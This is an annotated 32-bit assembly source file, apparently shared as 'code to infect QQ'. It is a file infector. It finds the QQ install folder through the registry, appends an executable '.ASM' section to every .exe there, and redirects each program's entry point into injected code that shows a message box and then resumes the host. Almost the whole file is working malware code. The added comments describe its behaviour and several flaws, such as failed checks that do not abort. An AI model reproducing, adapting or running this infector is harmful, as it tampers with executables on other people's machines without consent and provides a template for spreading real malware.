感染QQ的代码
; Build commands as given by the author:
;   ml /c /coff Add_Section.asm
;   link /subsystem:windows /section:.text,RWE Add_Section.res Add_Section.obj
; Syntax: MASM (Intel operand order), 32-bit flat model, stdcall; Win32 API via invoke.
;
; Analyst summary of this file: it reads the QQ install directory from the
; registry, enumerates *.exe files in that directory and appends a new
; read/write/execute code section to each one, redirecting the PE entry point
; into it (classic section-appending file infector). Host-side indicators
; visible in this source: a section named ".ASM", Characteristics 0E0000020h,
; AddressOfEntryPoint pointing at the last section, original entry point and
; image base stored inside the appended bytes.
.386
.model flat, stdcall
option casemap:none

include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib
include advapi32.inc
includelib advapi32.lib

; Prototypes. Neither name is defined or called in this file: the enumerator
; below calls _AddNewSection (with a leading underscore), not AddNewSection.
WndProc proto :DWORD, :DWORD, :DWORD, :DWORD
AddNewSection proto :DWORD

; Helper macro: CTEXT("...") places a NUL-terminated string in the CONST segment
; and expands to its offset. It is not used anywhere in this file.
CTEXT MACRO y:VARARG
    LOCAL sym
    CONST segment
    ifidni <y>,<>
        sym db 0
    else
        sym db y,0
    endif
    CONST ends
    exitm <offset sym>
ENDM

.const
MAXSIZE  equ 260                                            ; unused below
Head_Len equ sizeof IMAGE_NT_HEADERS + sizeof IMAGE_SECTION_HEADER ; bytes read from the target's PE header

.data
szRegKey        db 'SOFTWARE\TENCENT\QQ',0                  ; key holding the install path (under HKLM)
szKey           db 'Install',0                              ; value name
szStr1          dd REG_SZ                                   ; value type; not referenced below
FileNamePattern db "*.exe",0                                ; search pattern appended to the install path
ofn             OPENFILENAME <>                             ; not referenced below
FileNameOfQQ    db 256 dup(0)                               ; full path of the file currently being modified
PE_Header       IMAGE_NT_HEADERS <0>                        ; NT headers of the target. Head_Len bytes are read into
                                                            ; it, which is sizeof IMAGE_SECTION_HEADER more than it
                                                            ; holds; the excess lands in My_Section, which follows.
My_Section      IMAGE_SECTION_HEADER <>                     ; header of the section being appended
szDllName       db "User32", 0
szMessageBoxA   db "MessageBoxA", 0
FileName        db 256 dup(0)                               ; install directory read from the registry
szFile          db 256 dup(0)                               ; FileName followed by FileNamePattern
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; FillFileInfo
; Enumerates every file matching szFile, builds its full path in
; FileNameOfQQ (FileName + cFileName) and runs _AddNewSection on it.
; In:    szFile, FileName (globals, filled by _QueryKey)
; Out:   none; eax undefined on return
; Notes: edi is saved/restored by "uses edi"; eax/ecx/edx are clobbered
;        by the API calls.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
FillFileInfo proc uses edi
    LOCAL finddata:WIN32_FIND_DATA
    LOCAL hFindFile:DWORD

    invoke FindFirstFile,addr szFile,addr finddata
    .if eax!=INVALID_HANDLE_VALUE
        mov hFindFile,eax
        .repeat
            ; FileNameOfQQ = FileName + finddata.cFileName
            invoke RtlZeroMemory,addr FileNameOfQQ,sizeof FileNameOfQQ
            invoke lstrcat,addr FileNameOfQQ,addr FileName
            lea eax,finddata.cFileName
            invoke lstrcat,addr FileNameOfQQ,eax
            call _AddNewSection                     ; modify this executable
            invoke FindNextFile,hFindFile,addr finddata
        .until eax == FALSE
        invoke FindClose,hFindFile
    .endif
    ret
FillFileInfo endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; _QueryKey
; Reads the REG value HKLM\SOFTWARE\TENCENT\QQ\Install into FileName and
; builds szFile = FileName + "*.exe". The _lpKey parameter is never read.
; Out:   FileName, szFile (globals); eax undefined on return
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_QueryKey proc _lpKey
    LOCAL hKey :DWORD
    LOCAL BufSize :DWORD

    invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr szRegKey,NULL, KEY_QUERY_VALUE,addr hKey
    .if eax == ERROR_SUCCESS
        invoke RegQueryValueEx,hKey,addr szKey,NULL,NULL,addr FileName,addr BufSize
        .if eax == ERROR_SUCCESS
            invoke lstrcat,addr szFile,addr FileName
            invoke lstrcat,addr szFile,addr FileNamePattern
            invoke RegCloseKey,hKey                 ; only closed on the success path
        .endif
    .endif
    ret
_QueryKey endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Entry point: resolve the install directory, then process every *.exe in it.
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
main:
    call _QueryKey
    call FillFileInfo
    invoke ExitProcess,NULL

;--------------------------------------------------------------------------
; _AddNewSection
; Appends a new section to the PE file named in FileNameOfQQ and makes it
; the entry point. Sequence: read e_lfanew and the NT headers; check the
; "PE" signature and the room left in the headers; copy the original entry
; point and image base into the payload's variables; fill My_Section; write
; the section header; resolve MessageBoxA in this process and store the
; address in the payload; append the bytes starting at vStart to the end
; of the file; bump NumberOfSections and SizeOfImage, redirect
; AddressOfEntryPoint; write the NT headers back.
; In:    FileNameOfQQ (global)
; Out:   none; eax undefined on return
;--------------------------------------------------------------------------
_AddNewSection proc
    LOCAL hFile: HANDLE
    LOCAL dwPE_Header_OffSet: DWORD                 ; e_lfanew
    LOCAL dwFileReadWritten: DWORD
    LOCAL dwMySectionOffSet: DWORD                  ; file offset of the new section header slot
    LOCAL dwLastSection_SizeOfRawData: DWORD
    LOCAL dwLastSection_PointerToRawData: DWORD

    ; open the target for read and write
    invoke CreateFile, addr FileNameOfQQ, GENERIC_READ or GENERIC_WRITE,\
           FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL
    .if eax != INVALID_HANDLE_VALUE
        mov hFile, eax

        ;****************************************
        ; read the PE header: e_lfanew at offset 3Ch, then Head_Len bytes
        ; from that offset into PE_Header (and, past its end, My_Section)
        ;****************************************
        invoke SetFilePointer, hFile, 3ch, 0, FILE_BEGIN
        invoke ReadFile, hFile, addr dwPE_Header_OffSet, 4, addr dwFileReadWritten, NULL
        invoke SetFilePointer, hFile, dwPE_Header_OffSet, 0, FILE_BEGIN
        invoke ReadFile, hFile, addr PE_Header, Head_Len, addr dwFileReadWritten, NULL

        ;****************************************
        ; signature check: close the file if this is not a PE image
        ;****************************************
        .if [PE_Header.Signature] != IMAGE_NT_SIGNATURE
            invoke CloseHandle,hFile
        .endif

        ;****************************************
        ; is there room in the headers for one more section header?
        ; eax = e_lfanew + sizeof IMAGE_FILE_HEADER + SizeOfOptionalHeader
        ;       + (NumberOfSections + 1) * sizeof IMAGE_SECTION_HEADER
        ; (the 4-byte signature is not counted here, unlike the offset
        ; computation further down)
        ;****************************************
        movzx eax, [PE_Header.FileHeader.NumberOfSections]   ; section count before the add
        mov ecx, 28h                                ; 28h = sizeof IMAGE_SECTION_HEADER
        mul ecx                                     ; eax = NumberOfSections * sizeof IMAGE_SECTION_HEADER
        add eax, dwPE_Header_OffSet                 ; + PE header offset
        add eax, 18h                                ; 18h = sizeof IMAGE_FILE_HEADER
        movzx ecx, [PE_Header.FileHeader.SizeOfOptionalHeader]
        add eax, ecx                                ; + sizeof IMAGE_OPTIONAL_HEADER
        add eax, 28h                                ; + one more section header
        .if eax > [PE_Header.OptionalHeader.SizeOfHeaders]
            invoke CloseHandle,hFile
        .endif

        ;****************************************
        ; copy the original entry point and image base into the payload's
        ; variables; the appended code uses them to jump back to the host
        ;****************************************
        mov eax, [PE_Header.OptionalHeader.AddressOfEntryPoint]
        mov Old_AddressOfEntryPoint, eax
        mov eax, [PE_Header.OptionalHeader.ImageBase]
        mov Old_ImageBase, eax

        ;**************************************************
        ; file offset of the new section header: the slot right after the
        ; last existing section header
        ; (same arithmetic as the room check above, plus the 4-byte "PE\0\0")
        ;**************************************************
        movzx eax, [PE_Header.FileHeader.NumberOfSections]
        mov ecx, 28h
        mul ecx                                     ; eax = NumberOfSections * sizeof IMAGE_SECTION_HEADER
        add eax, 4h                                 ; 4h = sizeof "PE\0\0"
        add eax, dwPE_Header_OffSet
        add eax, sizeof IMAGE_FILE_HEADER
        add eax, sizeof IMAGE_OPTIONAL_HEADER
        mov dwMySectionOffSet, eax

        ;****************************************
        ; fill in the new section header (field meanings: see the PE format)
        ;****************************************
        mov dword ptr [My_Section.Name1], "MSA."    ; section name; the bytes in memory read ".ASM"
        mov [My_Section.Misc.VirtualSize], offset vEnd - offset vStart   ; payload length
        push [PE_Header.OptionalHeader.SizeOfImage] ; RVA = current end of image
        pop [My_Section.VirtualAddress]
        ; SizeOfRawData = (VirtualSize / FileAlignment + 1) * FileAlignment,
        ; i.e. rounded to a multiple of FileAlignment (always one full unit extra)
        mov eax, [My_Section.Misc.VirtualSize]
        mov ecx, [PE_Header.OptionalHeader.FileAlignment]
        cdq
        div ecx
        inc eax
        mul ecx
        mov [My_Section.SizeOfRawData], eax
        ; read SizeOfRawData and PointerToRawData of the last existing section:
        ; 18h bytes before the new slot is that section's SizeOfRawData field
        mov eax, dwMySectionOffSet
        sub eax, 18h
        invoke SetFilePointer, hFile, eax, 0, FILE_BEGIN
        invoke ReadFile, hFile, addr dwLastSection_SizeOfRawData, 4, addr dwFileReadWritten, NULL
        invoke ReadFile, hFile, addr dwLastSection_PointerToRawData, 4, addr dwFileReadWritten, NULL
        ; PointerToRawData = previous section's PointerToRawData + SizeOfRawData
        mov eax, dwLastSection_SizeOfRawData
        add eax, dwLastSection_PointerToRawData
        mov [My_Section.PointerToRawData], eax
        mov [My_Section.PointerToRelocations], 0h
        mov [My_Section.PointerToLinenumbers], 0h
        mov [My_Section.NumberOfRelocations], 0h
        mov [My_Section.NumberOfLinenumbers], 0h
        mov [My_Section.Characteristics], 0E0000020h ; code + execute + read + write (RWE)

        ;**************************************************
        ; write the new IMAGE_SECTION_HEADER into the section table
        ;**************************************************
        invoke SetFilePointer, hFile, dwMySectionOffSet, 0, FILE_BEGIN
        invoke WriteFile, hFile, addr My_Section, sizeof IMAGE_SECTION_HEADER, addr dwFileReadWritten, NULL

        ;****************************************
        ; resolve MessageBoxA in this process and store its absolute
        ; address into the payload (the GetModuleHandle result is discarded)
        ;****************************************
        invoke GetModuleHandle, addr szDllName
        invoke LoadLibrary, addr szDllName
        invoke GetProcAddress, eax, addr szMessageBoxA
        mov MessageBoxA_Addr, eax

        ;****************************************
        ; append the payload at end of file: SizeOfRawData bytes starting at
        ; vStart are written, which is more than vEnd - vStart
        ;****************************************
        invoke SetFilePointer, hFile, 0, 0, FILE_END
        push 0                                      ; lpOverlapped
        lea eax, dwFileReadWritten
        push eax                                    ; lpNumberOfBytesWritten
        push [My_Section.SizeOfRawData]             ; nNumberOfBytesToWrite
        lea eax, vStart
        push eax                                    ; lpBuffer
        push hFile                                  ; hFile
        call WriteFile

        ;**************************************************
        ; patch IMAGE_NT_HEADERS so the new section runs first:
        ; NumberOfSections, SizeOfImage and AddressOfEntryPoint
        ;**************************************************
        inc [PE_Header.FileHeader.NumberOfSections]
        ; SizeOfImage += (VirtualSize / SectionAlignment + 1) * SectionAlignment
        mov eax, [My_Section.Misc.VirtualSize]
        mov ecx, [PE_Header.OptionalHeader.SectionAlignment]
        cdq
        div ecx
        inc eax
        mul ecx
        add eax, [PE_Header.OptionalHeader.SizeOfImage]
        mov [PE_Header.OptionalHeader.SizeOfImage], eax   ; stays a multiple of SectionAlignment
        mov eax, [My_Section.VirtualAddress]
        mov [PE_Header.OptionalHeader.AddressOfEntryPoint], eax   ; entry point = first byte of the new section
        invoke SetFilePointer, hFile, dwPE_Header_OffSet, 0, FILE_BEGIN
        invoke WriteFile, hFile, addr PE_Header, sizeof IMAGE_NT_HEADERS, addr dwFileReadWritten, NULL

        ;****************************************
        ; done with this file
        ;****************************************
        invoke CloseHandle,hFile
    .endif
Err_CreateFile_Exit:
    ret
_AddNewSection endp

;****************************************
; Payload copied into each host (code followed by its data). It becomes the
; host's entry point. All references go through ebp so the code works at
; whatever address the host maps it.
;****************************************
vStart:
    call nStart
nStart:
    pop ebp
    sub ebp, offset nStart                          ; ebp = run-time address - assemble-time address (delta)

    ; show a message box: MessageBoxA(0, szMyMsg, szMyCaption, MB_OK|MB_ICONINFORMATION)
    push MB_OK or MB_ICONINFORMATION
    lea eax, szMyCaption[ebp]
    push eax
    lea eax, szMyMsg[ebp]
    push eax
    push 0
    call MessageBoxA_Addr[ebp]                      ; absolute address stored by _AddNewSection

    ; hand control to the host: jump to ImageBase + original AddressOfEntryPoint
    mov eax, Old_ImageBase[ebp]
    add eax, Old_AddressOfEntryPoint[ebp]
    push eax
    ret

    ; payload variables; _AddNewSection fills them before writing the bytes out
MessageBoxA_Addr dd 0
szMyMsg db "我是asm,你能看到我吗?", 13, 10, 13, 10,\
        "by asm",13, 10, "htt p://www.asm32.cn",0
szMyCaption db "test", 0
Old_ImageBase dd 0
Old_AddressOfEntryPoint dd 0
vEnd:

end main